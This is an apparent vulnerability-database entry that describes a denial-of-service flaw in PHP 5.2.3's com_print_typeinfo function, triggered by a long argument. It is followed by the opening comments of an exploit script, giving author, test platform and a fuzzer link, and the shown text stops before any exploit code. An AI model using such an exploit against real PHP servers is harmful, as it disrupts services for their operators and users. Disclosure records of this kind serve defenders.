The com_print_typeinfo function in the bz2 extension in PHP 5.2.3 allows context-dependent malicious users to cause a denial of service via a long argument.
<?php
//PHP 523 bz2 com_print_typeinfo() Remote DoS Exploit
//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: shinnaialtervistaorg
//Tested on xp sp2, worked both from the cli and on apache
//Bug discovered with "Footzo" (thanks to rgod)
//
//To download Footzo:
//original link: godraltervistaorg/indexphp?mod ...